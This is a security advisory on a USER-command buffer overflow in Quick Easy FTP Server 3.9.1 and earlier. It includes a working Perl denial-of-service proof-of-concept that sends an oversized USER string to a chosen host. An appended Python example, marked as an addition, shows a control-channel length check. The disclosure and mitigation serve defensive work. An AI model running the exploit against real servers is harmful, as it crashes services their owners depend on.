
Quick Easy FTP Server USER command Vulnerability






Software: Quick Easy FTP Server <=3.9.1
Vulnerability Published: 2010-07-22
Vulnerability Update Time: 2010-07-25
Vendor: No vendor response
Impact: Low
Bug Description:
Quick Easy FTP Server does not validate the size of the USER command input, which leads to a
denial-of-service flaw when more than 1600 characters are sent to it.
PoC:
****************************************************************
#!/usr/bin/perl -w
#DoS Exploit of Quick Easy Ftp Server version <=3.9.1 USER COMMAND Buffer Overflow
#Vulnerability Discoverer & Author : demonalex[at]163[dot]com
use Socket;
$host=shift;
$port=shift || '21';
if(!defined($host)){
die("usage: $0 \$host [\$port]\n");
}
#$payload='A'x1604;
$payload=('A'x1600)."\x3D\x41\x41\x41";         #mov     dword ptr [ebx+4], ebp
$target_ip=inet_aton($host);
$target=sockaddr_in($port, $target_ip);
socket(SOCK, AF_INET, SOCK_STREAM, 6);
connect(SOCK, $target);
undef($content);
recv(SOCK, $content, 100, 0);                   #get ftp banner
send(SOCK, "USER "."$payload\r\n", 0);
printf("send ok!\n");
close(SOCK);
exit(0);
****************************************************************
Credits: This vulnerability was discovered by demonalex@163.com 
         Pentester/Researcher
         Dark2S Security Team/Venustech.GZ Branch
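
Mitigation example: the size check that the Bug Description says is missing can be enforced by a proxy or monitor on the FTP control channel. This is an added example, not code from the advisory or from Quick Easy FTP Server; the names FtpCommandInspector and inspect_stream, the 512-byte line cap and the 64-byte USER cap are assumptions.

```python
# Added example, not from the advisory: length checks on the FTP control channel.
MAX_LINE = 512   # assumed cap on one command line, not a value from the advisory
MAX_USER = 64    # assumed cap on the USER argument

class FtpCommandInspector:
    """Reassemble control-channel bytes into commands and flag oversized ones."""

    def __init__(self, max_line=MAX_LINE, max_user=MAX_USER):
        self.max_line, self.max_user = max_line, max_user
        self.buf = b""
        self.discarding = False   # True while skipping the tail of a rejected line

    def feed(self, chunk):
        """Return (verdict, detail) tuples for the commands completed by chunk."""
        events = []
        self.buf += chunk
        while True:
            nl = self.buf.find(b"\n")
            if nl == -1:
                # No terminator yet: reject once the pending line is too long
                # instead of buffering untrusted data without bound.
                if len(self.buf) > self.max_line:
                    if not self.discarding:
                        events.append(("reject", "line exceeds %d bytes" % self.max_line))
                    self.discarding, self.buf = True, b""
                return events
            line, self.buf = self.buf[:nl], self.buf[nl + 1:]
            if self.discarding:           # tail of a line that was already rejected
                self.discarding = False
                continue
            if len(line) + 1 > self.max_line:
                events.append(("reject", "line exceeds %d bytes" % self.max_line))
                continue
            verb, _, arg = line.rstrip(b"\r").partition(b" ")
            if verb.upper() == b"USER" and len(arg) > self.max_user:
                events.append(("reject", "USER argument is %d bytes" % len(arg)))
            else:
                events.append(("allow", verb.upper().decode("ascii", "replace")))

def inspect_stream(chunks):
    """Run one connection's chunks through a fresh inspector."""
    inspector, events = FtpCommandInspector(), []
    for chunk in chunks:
        events.extend(inspector.feed(chunk))
    return events

# Constructed sample: normal login, oversized USER line in 500-byte segments, PASS.
big = b"USER " + b"A" * 1604 + b"\r\n"
SAMPLE = [b"USER alice\r\n"] + [big[i:i + 500] for i in range(0, len(big), 500)] + [b"PASS x\r\n"]
```

Calling inspect_stream(SAMPLE) rejects the oversized line as soon as the pending data passes the line cap, before its terminator arrives, and resumes normal parsing with the next command.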

